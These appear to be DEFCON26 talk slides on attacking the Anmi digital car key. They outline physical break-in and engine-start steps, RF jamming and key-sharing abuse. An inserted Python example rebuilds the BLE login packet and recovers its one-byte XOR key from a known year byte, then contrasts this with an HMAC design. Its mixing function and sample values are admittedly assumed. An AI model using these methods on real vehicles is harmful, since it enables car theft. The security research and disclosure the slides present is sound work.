DEFCON26 talk slides -- Please find demo videos at my Youtube channel: https://www.youtube.com/user/ReverseKevin/videos
Grand theft-auto-digital-key-hacking

Slide 1: GRAND THEFT AUTO -- DIGITAL KEY HACKING
@Kevin2600 @MonkeyKing

Slide 2: Agenda
- Introduction -- Keyfobs 101
- Structure & Functions -- Anmi-Key
- Analysis & Attack vectors -- Anmi-Key
- A0 -- Physical Access
- A1 -- RF Jamming Attack
- A2 -- Key-Sharing Analysis
- A3 -- BTLE Sniffing & Decryption

Slide 3: Introduction

Slide 4: Car-Keyfobs
- Mechanical Key Entry
- Remote Key Entry (Infrared; Fixed; Rolling)
- Passive Key Entry (Transponder RFID)
- Digital Key Entry (Mobile phone as Key)

Slide 5: New Trend ?

Slide 6: What's Been Hacked ?
- RKE KeeLoq algorithm cracked (2008)
- Passive Keyless Entry keyfob relay attack (2012)
- Gone in 60 seconds -- Hijacking with Hitag2 (2012)
- Samy's Rolljam -- Drive it like you hacked it (2015)
- BMW ConnectedDrive -- Telematics hacked (2015)
- Mitsubishi Outlander WiFi hacked -- PenTestPartners (2016)
- 14 vulnerabilities found in BMW connected cars -- KeenLab (2018)

Slide 7: New trend, new hack - 2015
- Dieter Spaar discovered a flaw in BMW ConnectedDrive that allowed him to remotely open the vehicle's lock
- Simulated a mobile network in a test environment with OpenBSC
- After being triggered by a decrypted SMS message, the vehicle sent a simple HTTP GET request to the server in order to retrieve the unlock command
http://tiny.cc/bmwconnectedrive

Slide 8: New trend, new hack - 2016
- Mitsubishi Outlander PHEV: top-selling hybrid SUV. Control of the car through its WiFi access point
- Unique SSID (REMOTEnnaaaa), easy to locate on wigle.net. The Wi-Fi PSK is too short to hold up against cracking
- Control protocols were reverse engineered: turn on/off air-conditioning, heating, lights and alarm !!!
http://tiny.cc/pentestpartners-Outlander

Slide 9: Structure & Functions -- Anmi

Slide 10: Digital Car key -- Anmi

Slide 11: Features
- Keyless Entrance System
- Keyless Engine Start/Stop
- Bluetooth Low Energy 4.0
- Auto Lock/Unlock Function
- Mobile as Key (Android; iPhone)
- Remote Key Sharing (20 Users)

Slide 12: Components

Slide 13: Key-Pairing

Slide 14: Car-Models

Slide 15: Internal 1

Slide 16: Internal 2

Slide 17: Internal 3
- BTLE-Module (CC2640) to communicate with the mobile APP over 2.4 GHz
- RF-Module (NXP-61X0915) emits the unlock/lock cmd to the vehicle. The RF-module varies between car models
- BTLE-Module (SYD8801) sensor. 2.4 GHz BTLE SoC, 32-bit ARM Cortex-M0. Functionality unknown ?

Slide 18: Mystery Sensor ?

Slide 19: Mystery Sensor ?

Slide 20: RF-Module
Oscillator: 13.560 MHz
Math:
13.560 MHz / 8000 = 1695 Hz
13.560 MHz * 32 = 433.92 MHz

Slide 21: SDR-HackRF

Slide 22: SDR-GQRX

Slide 23: BTLE-Module

Slide 24: BTLE-Interactive

Slide 25: BTLE-HCI-log

Slide 26: Mobile APP

Slide 27: Mobile APP - Codes

Slide 28: Mobile APP - Codes

Slide 29: Mobile APP - MitMProxy

Slide 30: Mobile APP - MitMProxy

Slide 31: Mobile APP - Server
Say bye bye to your privacy ..

Slide 32: Encryption ?

Slide 33: Super "Secure" ?
  35. 35. . Anmi-Key by request, always left in the car . Breaking glass by force. Get the Anmi-Key to ulock the door . Desolder the Registered Anmi chip and Mechanical Key put it into a blank key . Or use self design board to emits unlock cmd to the vehicle by RF-module . Start the engine and run away Old School way
  36. 36. DEMO
  37. 37. A1 -- RF Jamming
  38. 38. RF-Jammer
  39. 39. RF-Jammer
  40. 40. Does Anmi-Key smart enough to avoid this ?
  41. 41. One way communication ..
  42. 42. DEMO
  43. 43. What's Next DRIVE IT LIKE YOU HACKED IT @SamyKamkar
  44. 44. A2 -- Key-Sharing Analysis
  45. 45. Features
  46. 46. Analysis
  47. 47. What could possibly go wrong ?
  48. 48. Key-Sharing-Wechat
  49. 49. Key-Sharing-Wechat
  50. 50. DEMO
  51. 51. Let's cancel it then ?
  52. 52. DEMO
  53. 53. Let's wait until it expired ?
  54. 54. DEMO
Slide 55: A3 -- BTLE Sniffing & Decryption

Slide 56: Where is the "Secure" Encryption ?

Slide 57: BTLE -- Analysis

Slide 58: BTLE -- Analysis

Slide 59: BTLE -- Analysis

Slide 60: BTLE -- 1st Attempt

Slide 61: BTLE -- Login Steps

Slide 62: Login -- Encryption

Slide 63: BTLE -- Login Protocol
- Fetch a random value from Anmi-Key (4 bytes)
- Calculate EncryptionCode (Random Value; Secret Key)
- Wrap it up to make an encrypted login packet
- Send it to Anmi-Key and log in (Status 0xAA)

Slide 64: Login -- Encryption
Only a 1-byte key is needed.
Arg6 is a Dword random from "fetch random".
SecretKey is a fixed random Dword number from device initialization.

Slide 65: Login -- Encryption
Login Packet:
  +0   byte       channel 0xA1
  +1   short      len, fixed in 0301: 43 00
  +3   short      crc16
  +5   short      protocolver 0301
  +7   byte       usertype
  +8   uchar[16]  password
  +24  uchar[16]  enc_md5_username
  +40  uchar[16]  enc_md5_imei
  +56  uchar[6]   enc_advertising_key   // ascii
  +62  uchar[6]   enc_date              // YYMMDDHHMMSS
  +68  uchar      enc_openrssi
  +69  uchar      enc_lockRssi
What we need is to decrypt only 1 byte. What year is it now ?

Slide 66: Login -- Encryption
Recover "EncryptCode" from the fixed year byte: 0x12. Then you can get the rest.

Slide 67: Login -- Crafting Packets

Slide 68: Login -- Crafting Packets
Error Code 0x66 ???

Slide 69: Login -- Firmware Inspection
Flag[1] is set only when Anmi-Key is fully assembled.

Slide 70: Login -- Crafting Packets

Slide 71: Login -- Sniffing Packets

Slide 72: Login -- Sniffing Packets

Slide 73: Login -- Encryption
- 1 byte of encryption key
- XOR as the "super secure" encryption algorithm
- Easy to recover by sniffing the BTLE packets
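The login scheme on slides 63 through 73 fails for a reason worth seeing in code: a 4-byte challenge and a device secret are reduced to a single XOR byte, and the packet carries a field (the year in enc_date, 0x12 for 2018) whose plaintext any observer already knows, so one sniffed packet gives the key byte and then every other encrypted field. The following is an added example, not code from the talk or from the Anmi product: it models the slide 65 packet layout, reproduces the known-plaintext recovery the slide describes, and contrasts it with a challenge-response MAC in which the random value actually protects the exchange. The EncryptionCode mixing function, the CRC-16 polynomial and its covered range, which fields the XOR covers (taken from the enc_ prefixes on the slide), and all sample values are assumptions.

```python
"""Added example (not the talk's or Anmi's code): Anmi-Key style login packet,
why a 1-byte XOR "EncryptCode" falls to one known plaintext byte, and what a
challenge-response login with a MAC looks like instead."""
import hashlib
import hmac
import struct

CHANNEL = 0xA1                  # slide 65: +0 byte channel 0xA1
PROTOCOL_VER = b"\x03\x01"      # slide 65: +5 short protocolver, bytes taken literally
TOTAL_LEN = 70                  # last field enc_lockRssi sits at +69
BODY_OFFSET = 7                 # usertype starts at +7
ENC_OFFSET = 24                 # first field the slide prefixes with enc_ (assumption)
DATE_OFFSET = 62                # enc_date, YY MM DD HH MM SS as binary bytes
KNOWN_YEAR = 0x12               # slide 66: the year byte, 18 = 2018, known to any observer


def crc16_ccitt(data: bytes) -> int:
    """CRC-16/CCITT-FALSE (poly 0x1021, init 0xFFFF). The slide only says
    'crc16'; polynomial and covered range (offset 5 to end) are assumptions."""
    crc = 0xFFFF
    for b in data:
        crc ^= b << 8
        for _ in range(8):
            crc = ((crc << 1) ^ 0x1021) if crc & 0x8000 else (crc << 1)
            crc &= 0xFFFF
    return crc


def encrypt_code(random_dword: int, secret_key: int) -> int:
    """Assumed stand-in for EncryptionCode(Random, SecretKey). The real mixing
    is not on the slides; slide 64 only says one byte of it becomes the key."""
    mixed = ((random_dword ^ secret_key) * 0x9E3779B1) & 0xFFFFFFFF
    return (mixed >> 24) & 0xFF


def make_body(password: bytes, username: bytes, imei: bytes, adv_key: bytes,
              date: bytes, open_rssi: int, lock_rssi: int) -> bytes:
    """Plaintext body (+7 .. +69) in slide 65 order, before any XOR."""
    body = bytes([0x01])                          # usertype (constructed value)
    body += password.ljust(16, b"\0")[:16]        # password
    body += hashlib.md5(username).digest()        # md5_username
    body += hashlib.md5(imei).digest()            # md5_imei
    body += adv_key.ljust(6, b"\0")[:6]           # advertising_key, ascii
    body += date                                  # YYMMDDHHMMSS, 6 bytes
    body += bytes([open_rssi & 0xFF, lock_rssi & 0xFF])
    assert len(body) == TOTAL_LEN - BODY_OFFSET
    return body


def build_login_packet(key_byte: int, body: bytes) -> bytes:
    """XOR the enc_ fields with the single key byte and add the header. The len
    field 43 00 (= 67 = 70 - 3) matches the byte count after the len field."""
    enc_start = ENC_OFFSET - BODY_OFFSET
    enc_body = body[:enc_start] + bytes(b ^ key_byte for b in body[enc_start:])
    tail = PROTOCOL_VER + enc_body                # everything from +5 onward
    pkt = bytes([CHANNEL]) + struct.pack("<H", len(tail) + 2)
    pkt += struct.pack("<H", crc16_ccitt(tail)) + tail
    assert len(pkt) == TOTAL_LEN
    return pkt


def parse_login_packet(pkt: bytes) -> dict:
    """Header checks a receiver (or a sniffer-side decoder) would apply."""
    if len(pkt) != TOTAL_LEN or pkt[0] != CHANNEL:
        raise ValueError("not a login packet")
    length, crc = struct.unpack_from("<HH", pkt, 1)
    if length != len(pkt) - 3:
        raise ValueError("length mismatch")
    if crc != crc16_ccitt(pkt[5:]):
        raise ValueError("crc mismatch")
    return {"protocolver": pkt[5:7], "usertype": pkt[7],
            "password": pkt[8:24], "enc": pkt[ENC_OFFSET:]}


def recover_key_byte(pkt: bytes, known_year: int = KNOWN_YEAR) -> int:
    """Slide 66: with a single XOR byte, one known plaintext byte is enough,
    k = ciphertext ^ plaintext. The 4-byte random and the SecretKey add nothing."""
    return pkt[DATE_OFFSET] ^ known_year


def decrypt_enc_fields(pkt: bytes, key_byte: int) -> bytes:
    return bytes(b ^ key_byte for b in pkt[ENC_OFFSET:])


def challenge_response_tag(secret: bytes, challenge: bytes, body: bytes) -> bytes:
    """Assumed hardened design, not the product's: the key's 4-byte random is a
    challenge and the phone answers with HMAC(secret, challenge || body). A
    sniffed exchange reveals neither the secret nor a code that replays under
    a fresh challenge."""
    return hmac.new(secret, challenge + body, hashlib.sha256).digest()


def verify_challenge_response(secret: bytes, challenge: bytes, body: bytes, tag: bytes) -> bool:
    return hmac.compare_digest(challenge_response_tag(secret, challenge, body), tag)


if __name__ == "__main__":
    # Constructed sample values; none are real device data.
    k = encrypt_code(0x12345678, 0x1BADB002)
    body = make_body(b"123456", b"alice", b"000000000000000", b"ANMI01",
                     bytes([0x12, 8, 9, 10, 30, 0]), 0xC0, 0xA0)
    pkt = build_login_packet(k, body)
    print("key byte %02x, recovered from one sniffed packet: %02x" % (k, recover_key_byte(pkt)))
```

The recovery works for every possible key byte, including the 4-byte random and SecretKey feeding it, because the derivation's output space is 256 values and the year field is a public constant for a whole year; the HMAC variant shows the property the product lacks, namely that the challenge binds the response so a sniffed login cannot be decoded or replayed.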
Slide 74: DEMO

Slide 75: Report for CVE ?

Slide 76: Conclusion
- Security by obscurity !?
- Don't trust the user input
- New trends come with new hacks
- Test the product properly before going to market

Slide 77: Question ?